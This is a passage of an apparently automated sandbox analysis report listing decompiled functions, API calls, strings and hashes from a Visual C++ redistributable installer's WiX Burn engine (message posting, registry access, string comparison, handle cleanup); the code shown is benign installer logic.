                                                                          • Instruction Fuzzy Hash: 44F0E533B05B306BE72176B96C06AEB76DCCF09BA1F010126FE09FB191EA159D0046E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002E978 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 28%
                                                                          			E0002E978(intOrPtr _a4, long _a8) {
				signed short _t7;
				int _t13;

				_t13 = 0;
				if(PostThreadMessageW( *(_a4 + 0x10), 0x9003, 0, _a8) == 0) {
					_t7 = GetLastError();
					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "EngineForApplication.cpp", 0x2b4, _t13);
					_push("Failed to post apply message.");
					_push(_t13);
					E0005012F();
				}
				return _t13;
			}





                                                                          0x0002e982
                                                                          0x0002e995
                                                                          0x0002e997
                                                                          0x0002e9a8
                                                                          0x0002e9b2
                                                                          0x0002e9c0
                                                                          0x0002e9c5
                                                                          0x0002e9ca
                                                                          0x0002e9cb
                                                                          0x0002e9d1
                                                                          0x0002e9d6

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post apply message.
                                                                          • API String ID: 2609174426-2658443504
                                                                          • Opcode ID: 6478dddd089baf2e386f15037ca3c25e1c063e95054c6ed526b443ea0025bc4f
                                                                          • Instruction ID: 3869fca96befbd11d01d9e605bb4606a57cb0bef5c5138e97671957c8663bb76
                                                                          • Opcode Fuzzy Hash: 6478dddd089baf2e386f15037ca3c25e1c063e95054c6ed526b443ea0025bc4f
                                                                          • Instruction Fuzzy Hash: 26F0EC327403307BE7203AA9AC05ED77BC8DF04BA1F010026FE08FB091D625DD0086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002EA09 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 28%
                                                                          			E0002EA09(intOrPtr _a4, long _a8) {
				signed short _t7;
				int _t13;

				_t13 = 0;
				if(PostThreadMessageW( *(_a4 + 0x10), 0x9000, 0, _a8) == 0) {
					_t7 = GetLastError();
					_t16 =  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					_t13 =  >=  ? 0x80004005 :  <=  ? _t7 : _t7 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "EngineForApplication.cpp", 0x283, _t13);
					_push("Failed to post detect message.");
					_push(_t13);
					E0005012F();
				}
				return _t13;
			}





                                                                          0x0002ea13
                                                                          0x0002ea26
                                                                          0x0002ea28
                                                                          0x0002ea39
                                                                          0x0002ea43
                                                                          0x0002ea51
                                                                          0x0002ea56
                                                                          0x0002ea5b
                                                                          0x0002ea5c
                                                                          0x0002ea62
                                                                          0x0002ea67

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastMessagePostThread
                                                                          • String ID: @Met$userForApplication.cpp$Failed to post detect message.
                                                                          • API String ID: 2609174426-346287489
                                                                          • Opcode ID: c9f1bdbabba74f09f70b0f66e345a774c1d053266272ebe27046869601fa7bf0
                                                                          • Instruction ID: 72111715684d38e459963a30a5e457cbd61758e159a028baca2ad9f67e99ef2f
                                                                          • Opcode Fuzzy Hash: c9f1bdbabba74f09f70b0f66e345a774c1d053266272ebe27046869601fa7bf0
                                                                          • Instruction Fuzzy Hash: 53F0A032B403316BE7206AAAAC09F977BC8EF04BA1F014121FE08EA091D625DE00C6E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00055D7F Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 159stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 38%
                                                                          			E00055D7F(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, WCHAR* _a24, intOrPtr _a28, void** _a32, void** _a36, intOrPtr _a40) {
				int _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t33;
				intOrPtr* _t42;
				void* _t43;
				signed short _t46;
				void* _t50;
				void* _t62;
				WCHAR* _t63;
				intOrPtr* _t64;
				signed int _t65;
				intOrPtr* _t67;
				WCHAR* _t68;
				void* _t71;
				void* _t75;
				void* _t76;
				WCHAR* _t77;

				_t75 = 0;
				_t62 = 0;
				_t65 = 7;
				_t33 = memset( &_v40, 0, _t65 << 2);
				_v8 = 0;
				_t71 = _t33;
				while(1) {
					_v12 = _t75;
					if(_t62 != 0) {
						 *0x7a96c(_t62);
						_t62 = _t75;
						_v8 = _t62;
					}
					if(_t71 != 0) {
						 *0x7a96c(_t71);
						_t71 = _t75;
					}
					_t76 = E00058C77( *_a8,  &_v40);
					if(_t76 < 0) {
						break;
					}
					_t77 = _a24;
					if(_t77 == 0) {
						L9:
						_t68 = _v24;
						L10:
						_t42 = _a20;
						if(_t42 == 0) {
							L12:
							_t67 = _v28;
							L13:
							_t43 = 3;
							_t44 =  ==  ? 1 : _t43;
							_t71 =  *0x7a994(_a4, _v36, _v32, _t67, _t68,  ==  ? 1 : _t43, 0, 0);
							if(_t71 == 0) {
								_t46 = GetLastError();
								_t80 =  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
								_t76 =  >=  ? 0x80004005 :  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
								E000137D3(0x80004005, "dlutil.cpp", 0x1fe, _t76);
								break;
							}
							_t63 = _a20;
							if(_t63 != 0 &&  *_t63 != 0 && _t77 != 0 &&  *_t77 != 0) {
								_push(lstrlenW(_t63));
								_push(_t63);
								_t64 =  *0x7a970; // 0x5a79b
								_push(0x2b);
								_push(_t71);
								if( *_t64() != 0) {
									 *_t64(_t71, 0x2c, _t77, lstrlenW(_t77));
								}
							}
							_t50 = E00055F0F(_t67, _t71, _a12, _v40, _v20, _v16, _a16,  &_v8);
							_t62 = _v8;
							_t76 = _t50;
							if(_t76 >= 0) {
								_t76 = E0005602B(_t67, _t62, _a8, _a28,  &_v12, _a40);
								if(_t76 < 0) {
									break;
								}
								if(_v12 != 0) {
									_t75 = 0;
									continue;
								}
								 *_a32 = _t71;
								_t71 = 0;
								 *_a36 = _t62;
								_t62 = 0;
							}
							break;
						}
						_t67 = _t42;
						if( *_t42 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t68 = _t77;
					if( *_t77 != 0) {
						goto L10;
					}
					goto L9;
				}
				E00058CA2( &_v40);
				if(_t62 != 0) {
					 *0x7a96c(_t62);
				}
				if(_t71 != 0) {
					 *0x7a96c(_t71);
				}
				return _t76;
			}



























                                                                          0x00055d88
                                                                          0x00055d91
                                                                          0x00055d93
                                                                          0x00055d94
                                                                          0x00055d96
                                                                          0x00055d99
                                                                          0x00055d9f
                                                                          0x00055d9f
                                                                          0x00055da4
                                                                          0x00055da7
                                                                          0x00055dad
                                                                          0x00055daf
                                                                          0x00055daf
                                                                          0x00055db4
                                                                          0x00055db7
                                                                          0x00055dbd
                                                                          0x00055dbd
                                                                          0x00055dcd
                                                                          0x00055dd1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055dd7
                                                                          0x00055dde
                                                                          0x00055de7
                                                                          0x00055de7
                                                                          0x00055dea
                                                                          0x00055dea
                                                                          0x00055def
                                                                          0x00055df8
                                                                          0x00055df8
                                                                          0x00055dfb
                                                                          0x00055dff
                                                                          0x00055e06
                                                                          0x00055e1b
                                                                          0x00055e1f
                                                                          0x00055eb7
                                                                          0x00055ec8
                                                                          0x00055ed2
                                                                          0x00055ee0
                                                                          0x00000000
                                                                          0x00055ee0
                                                                          0x00055e25
                                                                          0x00055e2a
                                                                          0x00055e43
                                                                          0x00055e44
                                                                          0x00055e45
                                                                          0x00055e4b
                                                                          0x00055e4d
                                                                          0x00055e52
                                                                          0x00055e60
                                                                          0x00055e60
                                                                          0x00055e52
                                                                          0x00055e76
                                                                          0x00055e7b
                                                                          0x00055e7e
                                                                          0x00055e82
                                                                          0x00055e97
                                                                          0x00055e9b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055ea1
                                                                          0x00055d9d
                                                                          0x00000000
                                                                          0x00055d9d
                                                                          0x00055eaa
                                                                          0x00055eac
                                                                          0x00055eb1
                                                                          0x00055eb3
                                                                          0x00055eb3
                                                                          0x00000000
                                                                          0x00055e82
                                                                          0x00055df1
                                                                          0x00055df6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055df6
                                                                          0x00055de0
                                                                          0x00055de5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00055de5
                                                                          0x00055ee9
                                                                          0x00055ef0
                                                                          0x00055ef3
                                                                          0x00055ef3
                                                                          0x00055efb
                                                                          0x00055efe
                                                                          0x00055efe
                                                                          0x00055f0c

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: @Met$dlutil.cpp
                                                                          • API String ID: 1659193697-1896680629
                                                                          • Opcode ID: d531c8e9bb62894bb89f0bb6c0ba59a3c7b13be4356726c4860efccf3a6544e6
                                                                          • Instruction ID: 59c0c2d11a0e2c6a4aee69c9aa33a7062a9558a554df9bcb7497181f2625561f
                                                                          • Opcode Fuzzy Hash: d531c8e9bb62894bb89f0bb6c0ba59a3c7b13be4356726c4860efccf3a6544e6
                                                                          • Instruction Fuzzy Hash: 6951F432A00615ABDB219FA48C95DAFBBF9EF88752F054015FE05B7250DB35CD458BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0005937F Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0005937F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t58;
				void* _t60;

				_t58 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v24 = 0;
				_t60 = E00050E3F(_a4,  *0x7a7e0, 0x20019,  &_v16);
				if(_t60 == 0x80070002 || _t60 < 0) {
					L17:
					if(_v12 != 0) {
						RegCloseKey(_v12);
						_v12 = 0;
					}
					if(_v8 != 0) {
						RegCloseKey(_v8);
						_v8 = 0;
					}
					if(_v16 != 0) {
						RegCloseKey(_v16);
					}
					return _t60;
				} else {
					_t60 = E00050E3F(_v16, _a8, 0x20019,  &_v8);
					if(_t60 != 0x80070002 && _t60 >= 0) {
						_t60 = E00050E3F(_v8,  *0x7a7e4, 0x20019,  &_v12);
						if(_t60 != 0x80070002 && _t60 >= 0) {
							_t60 = E00050B49(_t58, _v12, _a12, 0, 1);
							if(_t60 < 0) {
								goto L17;
							}
							_t60 = E00050E9B(_v12,  &_v20, 0);
							if(_t60 >= 0 && _v20 <= 0) {
								if(_v12 != 0) {
									RegCloseKey(_v12);
									_v12 = 0;
								}
								_t60 = E00050B49(_t58, _v8,  *0x7a7e4, 0, 0);
								if(_t60 >= 0) {
									_t60 = E00050E9B(_v8, 0,  &_v24);
									if(_t60 >= 0 && _v24 == 0) {
										if(_v8 != 0) {
											RegCloseKey(_v8);
											_v8 = 0;
										}
										_t60 = E00050B49(_t58, _v16, _a8, 0, 0);
									}
								}
							}
						}
					}
					goto L17;
				}
			}










                                                                          0x0005937f
                                                                          0x00059399
                                                                          0x0005939f
                                                                          0x000593a2
                                                                          0x000593a5
                                                                          0x000593a8
                                                                          0x000593b6
                                                                          0x000593be
                                                                          0x000594a6
                                                                          0x000594a9
                                                                          0x000594ae
                                                                          0x000594b0
                                                                          0x000594b0
                                                                          0x000594b6
                                                                          0x000594bb
                                                                          0x000594bd
                                                                          0x000594bd
                                                                          0x000594c3
                                                                          0x000594c8
                                                                          0x000594c8
                                                                          0x000594d2
                                                                          0x000593cc
                                                                          0x000593e0
                                                                          0x000593e8
                                                                          0x0005940d
                                                                          0x00059415
                                                                          0x00059431
                                                                          0x00059435
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00059444
                                                                          0x00059448
                                                                          0x00059452
                                                                          0x00059457
                                                                          0x00059459
                                                                          0x00059459
                                                                          0x0005946c
                                                                          0x00059470
                                                                          0x0005947f
                                                                          0x00059483
                                                                          0x0005948d
                                                                          0x00059492
                                                                          0x00059494
                                                                          0x00059494
                                                                          0x000594a4
                                                                          0x000594a4
                                                                          0x00059483
                                                                          0x00059470
                                                                          0x00059448
                                                                          0x00059415
                                                                          0x00000000
                                                                          0x000593e8

                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 00059457
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 00059492
                                                                          • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000), ref: 000594AE
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 000594BB
                                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000), ref: 000594C8
                                                                            • Part of subcall function 00050B49: RegCloseKey.ADVAPI32(00000000), ref: 00050CA0
                                                                            • Part of subcall function 00050E9B: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00059444,00000001), ref: 00050EB3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close$InfoOpenQuery
                                                                          • String ID:
                                                                          • API String ID: 796878624-0
                                                                          • Opcode ID: 381a2440df9004220073956c402feb9002b90f4d43261dff108763d0927b57c3
                                                                          • Instruction ID: f3d917c9fcfae6fd8108880c843871ba34029a60fbdef589293428061e16f5be
                                                                          • Opcode Fuzzy Hash: 381a2440df9004220073956c402feb9002b90f4d43261dff108763d0927b57c3
                                                                          • Instruction Fuzzy Hash: AE410B72C0122DFFDF11AF958D81DAEFB7AEF04361B1145AAED0076121C7324E559E90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000188DE Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 65%
                                                                          			E000188DE(void* __ecx, void* __edx, int _a4, short* _a8, short* _a12, intOrPtr* _a16) {
				int _v8;
				short* _t38;
				int _t43;
				int _t46;
				intOrPtr _t49;
				intOrPtr _t53;
				int _t55;
				void* _t57;
				unsigned int _t59;
				void* _t60;
				int _t61;
				int _t67;
				void* _t75;

				_t57 = __edx;
				_t49 = 0;
				_t59 = _a4;
				_v8 = _t59 >> 0x00000011 & 0x00000001;
				_a4 = lstrlenW(_a8);
				_t67 = lstrlenW(_a12);
				if(_t59 > 0x3000a) {
					_t60 = _t59 - 0x3000b;
					if(_t60 == 0) {
						goto L21;
					} else {
						if(_t60 == 1) {
							goto L16;
						} else {
							goto L11;
						}
					}
				} else {
					if(_t59 >= 0x30005) {
						L7:
						_t46 = CompareStringW(0x7f, _v8, _a8, _a4, _a12, _t67);
						asm("cdq");
						_t49 = E00018786(_t59, _t46, _t57, 2, _t49, _a16);
					} else {
						if(_t59 < 0x10005) {
							L12:
							_t49 = 0x80070057;
						} else {
							if(_t59 <= 0x1000a) {
								goto L7;
							} else {
								if(_t59 == 0x1000b) {
									L21:
									_t61 = _a4;
									if(_t67 > _t61) {
										L25:
										 *_a16 = _t49;
									} else {
										_t38 = _a8;
										_a4 = _t67;
										while(CompareStringW(0x7f, _v8, _t38, _t67, _a12, _t67) != 2) {
											_t38 =  &(_a8[1]);
											_t55 = _a4 + 1;
											_a8 = _t38;
											_a4 = _t55;
											if(_t55 <= _t61) {
												continue;
											} else {
												goto L25;
											}
											goto L26;
										}
										goto L19;
									}
								} else {
									if(_t59 == 0x1000c) {
										L16:
										if(_a4 < _t67) {
											goto L15;
										} else {
											_push(_t67);
											_push(_a12);
											_push(_t67);
											_push(_a8);
											goto L18;
										}
										goto L20;
									} else {
										_t75 = _t59 - 0x1000d;
										L11:
										if(_t75 == 0) {
											_t43 = _a4;
											if(_t43 < _t67) {
												L15:
												_t53 = _t49;
											} else {
												_push(_t67);
												_push(_a12);
												_push(_t67);
												_push( &(_a8[_t43 - _t67]));
												L18:
												if(CompareStringW(0x7f, _v8, ??, ??, ??, ??) != 2) {
													goto L15;
												} else {
													L19:
													_t53 = 1;
												}
											}
											L20:
											 *_a16 = _t53;
										} else {
											goto L12;
										}
									}
								}
							}
						}
					}
				}
				L26:
				return _t49;
			}
















                                                                          0x000188de
                                                                          0x000188ea
                                                                          0x000188ed
                                                                          0x000188fb
                                                                          0x00018903
                                                                          0x00018908
                                                                          0x00018910
                                                                          0x00018971
                                                                          0x00018977
                                                                          0x00000000
                                                                          0x00018979
                                                                          0x0001897c
                                                                          0x00000000
                                                                          0x0001897e
                                                                          0x00000000
                                                                          0x0001897e
                                                                          0x0001897c
                                                                          0x00018912
                                                                          0x00018918
                                                                          0x00018946
                                                                          0x00018955
                                                                          0x0001895e
                                                                          0x0001896a
                                                                          0x0001891a
                                                                          0x00018920
                                                                          0x00018983
                                                                          0x00018983
                                                                          0x00018922
                                                                          0x00018928
                                                                          0x00000000
                                                                          0x0001892a
                                                                          0x00018930
                                                                          0x000189cc
                                                                          0x000189cc
                                                                          0x000189d1
                                                                          0x00018a03
                                                                          0x00018a06
                                                                          0x000189d3
                                                                          0x000189d3
                                                                          0x000189d6
                                                                          0x000189d9
                                                                          0x000189f5
                                                                          0x000189f8
                                                                          0x000189f9
                                                                          0x000189fc
                                                                          0x00018a01
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00018a01
                                                                          0x00000000
                                                                          0x000189d9
                                                                          0x00018936
                                                                          0x0001893c
                                                                          0x000189a5
                                                                          0x000189a8
                                                                          0x00000000
                                                                          0x000189aa
                                                                          0x000189aa
                                                                          0x000189ab
                                                                          0x000189ae
                                                                          0x000189af
                                                                          0x00000000
                                                                          0x000189af
                                                                          0x00000000
                                                                          0x0001893e
                                                                          0x0001893e
                                                                          0x00018981
                                                                          0x00018981
                                                                          0x0001898a
                                                                          0x0001898f
                                                                          0x000189a1
                                                                          0x000189a1
                                                                          0x00018991
                                                                          0x00018996
                                                                          0x00018997
                                                                          0x0001899a
                                                                          0x0001899e
                                                                          0x000189b2
                                                                          0x000189c0
                                                                          0x00000000
                                                                          0x000189c2
                                                                          0x000189c2
                                                                          0x000189c4
                                                                          0x000189c4
                                                                          0x000189c0
                                                                          0x000189c5
                                                                          0x000189c8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00018981
                                                                          0x0001893c
                                                                          0x00018930
                                                                          0x00018928
                                                                          0x00018920
                                                                          0x00018918
                                                                          0x00018a08
                                                                          0x00018a10

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00018A9E,000195E7,?,000195E7,?,?,000195E7,?,?), ref: 000188FE
                                                                          • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00018A9E,000195E7,?,000195E7,?,?,000195E7,?,?), ref: 00018906
                                                                          • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00018A9E,000195E7,?,000195E7,?), ref: 00018955
                                                                          • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00018A9E,000195E7,?,000195E7,?), ref: 000189B7
                                                                          • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00018A9E,000195E7,?,000195E7,?), ref: 000189E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString$lstrlen
                                                                          • String ID:
                                                                          • API String ID: 1657112622-0
                                                                          • Opcode ID: 256d23b3e61120b57f6bde540fb658a2bf1e5c9a59319f00a37df08d131bdb72
                                                                          • Instruction ID: b5d63d1e5b7b56d3b120d7390c070def0916f8281ceced85cd146e4cf333c489
                                                                          • Opcode Fuzzy Hash: 256d23b3e61120b57f6bde540fb658a2bf1e5c9a59319f00a37df08d131bdb72
                                                                          • Instruction Fuzzy Hash: 9E317372600149BFDF258E58CC84AFE7FAAEF49390F18C015F95997111CA359AD0DB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001738E Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 31%
                                                                          			E0001738E(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t15;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				EnterCriticalSection(_a4);
				_t22 = E00015C87(_t20, _a4, _a8,  &_v8);
				_t15 = _v8;
				if(_t22 < 0 ||  *((intOrPtr*)(_t15 + 0x18)) != 0) {
					if(_t22 != 0x80070490) {
						if(_t22 >= 0) {
							_t22 = E000300E0(_t15 + 8, _a12);
							if(_t22 < 0) {
								_push(_a8);
								_push("Failed to get value as string for variable: %ls");
								goto L8;
							}
						} else {
							_push(_a8);
							_push("Failed to get value of variable: %ls");
							L8:
							_push(_t22);
							E0005012F();
						}
					}
				} else {
					_t22 = 0x80070490;
				}
				LeaveCriticalSection(_a4);
				return _t22;
			}






                                                                          0x0001738e
                                                                          0x00017391
                                                                          0x00017392
                                                                          0x0001739a
                                                                          0x000173af
                                                                          0x000173b1
                                                                          0x000173b6
                                                                          0x000173cb
                                                                          0x000173cf
                                                                          0x000173e7
                                                                          0x000173eb
                                                                          0x000173ed
                                                                          0x000173f0
                                                                          0x00000000
                                                                          0x000173f0
                                                                          0x000173d1
                                                                          0x000173d1
                                                                          0x000173d4
                                                                          0x000173f5
                                                                          0x000173f5
                                                                          0x000173f6
                                                                          0x000173fb
                                                                          0x000173cf
                                                                          0x000173be
                                                                          0x000173be
                                                                          0x000173be
                                                                          0x00017401
                                                                          0x0001740d

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(000152B5,WixBundleOriginalSource,?,?,0002A41D,000153B5,WixBundleOriginalSource,0001533D,0007AA90,?,00000000,0001533D,?,00027587,?,?), ref: 0001739A
                                                                          • LeaveCriticalSection.KERNEL32(000152B5,000152B5,00000000,00000000,?,?,0002A41D,000153B5,WixBundleOriginalSource,0001533D,0007AA90,?,00000000,0001533D,?,00027587), ref: 00017401
                                                                          Strings
                                                                          • Failed to get value of variable: %ls, xrefs: 000173D4
                                                                          • Failed to get value as string for variable: %ls, xrefs: 000173F0
                                                                          • WixBundleOriginalSource, xrefs: 00017396
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
                                                                          • API String ID: 3168844106-30613933
                                                                          • Opcode ID: 3af97006a2efa65d32649dbbc7045bd5c155b5ba8344c3c431434c8e2326c705
                                                                          • Instruction ID: c4d94538891acd101c0c70a3f0389cd7136e5988847c55b57220f70cc9436571
                                                                          • Opcode Fuzzy Hash: 3af97006a2efa65d32649dbbc7045bd5c155b5ba8344c3c431434c8e2326c705
                                                                          • Instruction Fuzzy Hash: FE01B132945628FBCF225F50CC05ADE3B74EB04762F208021FD18AA220C7369E90ABE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003CEF5 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E0003CEF5(void* __ebx, void* __edi, void** _a4) {
				void* _t13;
				void** _t26;

				_t26 = _a4;
				if(_t26 != 0) {
					if( *_t26 != 0) {
						CloseHandle( *_t26);
						 *_t26 = 0;
					}
					if(_t26[1] != 0) {
						CloseHandle(_t26[1]);
						_t26[1] = 0;
					}
					if(_t26[2] != 0) {
						CloseHandle(_t26[2]);
						_t26[2] = 0;
					}
					if(_t26[3] != 0) {
						CloseHandle(_t26[3]);
						_t26[3] = 0;
					}
					if(_t26[4] != 0) {
						UnmapViewOfFile(_t26[4]);
					}
					return E00013999(_t26);
				}
				return _t13;
			}





                                                                          0x0003cef9
                                                                          0x0003cefe
                                                                          0x0003cf0c
                                                                          0x0003cf10
                                                                          0x0003cf12
                                                                          0x0003cf12
                                                                          0x0003cf17
                                                                          0x0003cf1c
                                                                          0x0003cf1e
                                                                          0x0003cf1e
                                                                          0x0003cf24
                                                                          0x0003cf29
                                                                          0x0003cf2b
                                                                          0x0003cf2b
                                                                          0x0003cf31
                                                                          0x0003cf36
                                                                          0x0003cf38
                                                                          0x0003cf38
                                                                          0x0003cf40
                                                                          0x0003cf45
                                                                          0x0003cf45
                                                                          0x00000000
